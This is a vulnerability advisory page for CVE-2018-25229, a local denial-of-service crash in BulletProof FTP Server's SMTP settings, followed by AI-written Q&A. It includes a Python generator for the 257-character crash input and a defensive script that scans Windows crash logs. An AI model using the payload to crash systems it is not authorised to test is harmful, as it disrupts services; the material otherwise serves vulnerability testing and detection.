CVE-2018-25229
Status: Received - Intake
Buffer Overflow in BulletProof FTP SMTP Interface Causes DoS

Publication date: 2026-03-30

Last updated on: 2026-03-31

Assigner: VulnCheck

Description
BulletProof FTP Server 2019.0.0.50 contains a denial of service vulnerability in the SMTP configuration interface that allows local attackers to crash the application by supplying an oversized string. Attackers can input a buffer of 257 'A' characters in the SMTP Server field and trigger a crash by clicking the Test button.
Meta Information
Generated: 2026-05-06
AI Q&A: 2026-03-30
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
1 associated CPE
Vendor | Product | Version / Range
bpftpserver | bulletproof_ftp_server | 2019.0.0.50
CWE
CWE ID | Description
CWE-1282 | Immutable data, such as a first-stage bootloader, device identifiers, and "write-once" configuration settings are stored in writable memory that can be re-programmed or updated in the field.
Note: the listed CWE-1282 (Assumed-Immutable Data is Stored in Writable Memory) does not match the flaw in the Description above, which is a buffer overflow triggered by an oversized input; CWE-120 (Buffer Copy without Checking Size of Input, 'Classic Buffer Overflow') is the weakness class that corresponds to the reported behaviour. Treat the CWE field on this entry as a mis-mapping rather than as a description of the bug.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2018-25229 is a denial of service vulnerability in BulletProof FTP Server version 2019.0.0.50. It exists in the SMTP configuration interface where local attackers can crash the application by inputting an oversized string.

Specifically, entering a buffer of 257 'A' characters into the SMTP Server field and clicking the Test button crashes the application: the field's value is neither validated nor length-bounded, and the oversized input produces a buffer overflow condition.


How can this vulnerability impact me?

This vulnerability can cause the BulletProof FTP Server application to crash, resulting in a denial of service condition.

Since the attack requires local access and user interaction, an attacker with local access can disrupt the availability of the FTP server by triggering this crash.

The impact described is limited to denial of service; no confidentiality or integrity impact is reported.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by attempting to reproduce the denial of service condition in the BulletProof FTP Server application. Specifically, you can test the SMTP Server configuration interface by entering a string of 257 'A' characters into the SMTP Server field and then clicking the Test button. Do this on a test instance rather than a production server, since a successful reproduction crashes the service.

A practical method is to create a text file containing 257 'A' characters (with no trailing newline, which would change the pasted length), copy the string to the clipboard, and paste it into the SMTP Server input field within the application's settings.

There is no network command that detects this vulnerability remotely, since triggering it requires local interaction with the application's GUI; the only version-based check is to confirm whether build 2019.0.0.50 is installed. The input itself can be scripted, as demonstrated by a Python script that generates the malicious string.
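The following is an added example of such a generator, written for this page; it is not the script referenced above, the original proof of concept, or vendor code. It builds the 257-character run of 'A' described in the advisory, writes it to a text file without a trailing newline, and on Windows can push it onto the clipboard through the built-in clip.exe. The boundary sweep is an assumption of the example: the page reports only that 257 characters trigger the crash, not where the real threshold lies, so a tester may want inputs just below and above that length.

```python
"""Generate the oversized SMTP Server value described in CVE-2018-25229.

Added example, not the page's script or the vendor's code. Produces the
257-byte run of 'A' the advisory describes, writes it to a file for pasting,
and on Windows can copy it to the clipboard via clip.exe.
"""
import subprocess
import sys
from pathlib import Path

REPORTED_TRIGGER_LENGTH = 257  # length given in the advisory


def build_payload(length: int = REPORTED_TRIGGER_LENGTH, fill: str = "A") -> str:
    """Return a string of `length` copies of the single ASCII character `fill`."""
    if length <= 0:
        raise ValueError("length must be positive")
    if len(fill) != 1 or not fill.isascii():
        raise ValueError("fill must be a single ASCII character")
    return fill * length


def boundary_sweep(reported: int = REPORTED_TRIGGER_LENGTH, margin: int = 2) -> dict:
    """Candidate inputs around the reported trigger length, for locating the
    exact threshold in a lab (assumption: the page gives no safe maximum).
    Keys are lengths, values are the inputs."""
    return {n: build_payload(n) for n in range(reported - margin, reported + margin + 1)}


def write_payload(path, length: int = REPORTED_TRIGGER_LENGTH) -> int:
    """Write the payload as ASCII with no trailing newline (a newline would
    change the pasted length) and return the number of bytes written."""
    data = build_payload(length).encode("ascii")
    Path(path).write_bytes(data)
    return len(data)


def copy_to_clipboard(text: str) -> bool:
    """Copy `text` to the Windows clipboard using clip.exe, which reads stdin.
    Returns False on other platforms instead of failing."""
    if sys.platform != "win32":
        return False
    subprocess.run(["clip"], input=text.encode("ascii"), check=True)
    return True


if __name__ == "__main__":
    out = Path("smtp_server_payload.txt")
    n = write_payload(out)
    print(f"wrote {n} bytes to {out}")
    if copy_to_clipboard(build_payload()):
        print("payload on clipboard; paste into the SMTP Server field and click Test")
```

Run it on the test machine, then paste the clipboard contents (or the file's contents) into the SMTP Server field and click Test; a crash confirms the installed build is affected.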


What immediate steps should I take to mitigate this vulnerability?

To mitigate this vulnerability immediately, avoid entering long strings into the SMTP Server field in the BulletProof FTP Server settings; the published trigger is a 257-character value, and the entry does not state a safe maximum.

Restrict local user access to the BulletProof FTP Server application so that untrusted users cannot interact with the SMTP configuration interface.

Monitor for application crashes related to the SMTP Server settings, and consider disabling or limiting use of the SMTP configuration interface until a patch or update is available.
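As an added example of the crash monitoring suggested above (written for this page, not part of the advisory or the vendor's software), the script below scans exported Windows Application log text for "Application Error" events (Event ID 1000) whose faulting image is the FTP server and flags those on the affected build. The image name bpftpserver.exe is an assumption taken from the CPE vendor string; substitute the real executable name. The one-line "Event ID / Source / Time" header is a simplified export format assumed for the example, while the message lines underneath follow the standard Event 1000 text. The sample events are constructed for this example, not captured from a live system.

```python
"""Flag crashes of the FTP server process in exported Windows Application
log text (Event ID 1000, source "Application Error").

Added example, not part of the advisory or the vendor's software. The image
name bpftpserver.exe is an assumption; the sample log is constructed.
"""
import re
from dataclasses import dataclass

AFFECTED_VERSION = "2019.0.0.50"
ASSUMED_IMAGE = "bpftpserver.exe"  # assumption, see docstring

# NTSTATUS codes that typically accompany memory-corruption crashes
MEMORY_CORRUPTION_CODES = {
    "0xc0000005",  # STATUS_ACCESS_VIOLATION
    "0xc0000409",  # STATUS_STACK_BUFFER_OVERRUN (/GS cookie check failed)
}

# Constructed sample: one FTP server crash, one unrelated crash, one non-1000 event
SAMPLE_LOG = """\
Event ID: 1000 Source: Application Error Time: 2026-03-30T10:14:02
Faulting application name: bpftpserver.exe, version: 2019.0.0.50, time stamp: 0x5c6a1f00
Faulting module name: bpftpserver.exe, version: 2019.0.0.50, time stamp: 0x5c6a1f00
Exception code: 0xc0000409
Fault offset: 0x0003a1b2
Faulting process id: 0x1a2c

Event ID: 1000 Source: Application Error Time: 2026-03-30T11:02:41
Faulting application name: notepad.exe, version: 10.0.19041.1, time stamp: 0x3a7f0b2c
Faulting module name: ntdll.dll, version: 10.0.19041.1, time stamp: 0x2b1d0f4e
Exception code: 0xc0000005
Fault offset: 0x0006f8e1
Faulting process id: 0x2f10

Event ID: 1001 Source: Windows Error Reporting Time: 2026-03-30T11:02:43
Fault bucket 123456789, type 4
"""


@dataclass
class Crash:
    time: str
    image: str
    version: str
    module: str
    exception_code: str

    @property
    def affected_version(self) -> bool:
        return self.version == AFFECTED_VERSION

    @property
    def memory_corruption(self) -> bool:
        return self.exception_code.lower() in MEMORY_CORRUPTION_CODES


_HEADER = re.compile(r"^Event ID: (\d+) Source: (.+?) Time: (\S+)")
_APP = re.compile(r"^Faulting application name: (.+?), version: (\S+),", re.M)
_MOD = re.compile(r"^Faulting module name: (.+?),", re.M)
_EXC = re.compile(r"^Exception code: (0x[0-9a-fA-F]+)", re.M)


def parse_events(text: str):
    """Yield (event_id, time, record_text) for each blank-line-separated record."""
    for block in re.split(r"\n\s*\n", text.strip()):
        head = _HEADER.match(block)
        if head:
            yield int(head.group(1)), head.group(3), block


def find_crashes(text: str, image: str = ASSUMED_IMAGE) -> list:
    """Return Application Error (ID 1000) records whose faulting application
    name matches `image` (case-insensitive), oldest first."""
    crashes = []
    for event_id, when, block in parse_events(text):
        if event_id != 1000:
            continue
        app = _APP.search(block)
        if not app or app.group(1).lower() != image.lower():
            continue
        mod = _MOD.search(block)
        exc = _EXC.search(block)
        crashes.append(Crash(
            time=when,
            image=app.group(1),
            version=app.group(2),
            module=mod.group(1) if mod else "?",
            exception_code=exc.group(1) if exc else "?",
        ))
    return crashes


if __name__ == "__main__":
    for c in find_crashes(SAMPLE_LOG):
        build = "AFFECTED BUILD" if c.affected_version else "other build"
        kind = "memory corruption" if c.memory_corruption else "other fault"
        print(f"{c.time} {c.image} {c.version} ({build}) {c.exception_code} {kind} in {c.module}")
```

A crash of the affected build with a STATUS_STACK_BUFFER_OVERRUN or access-violation code shortly after someone edited the SMTP settings is the signal to look for; export the real log with the same per-record layout, or adapt the header regex to the export format you use.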


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The provided information does not specify any direct impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.

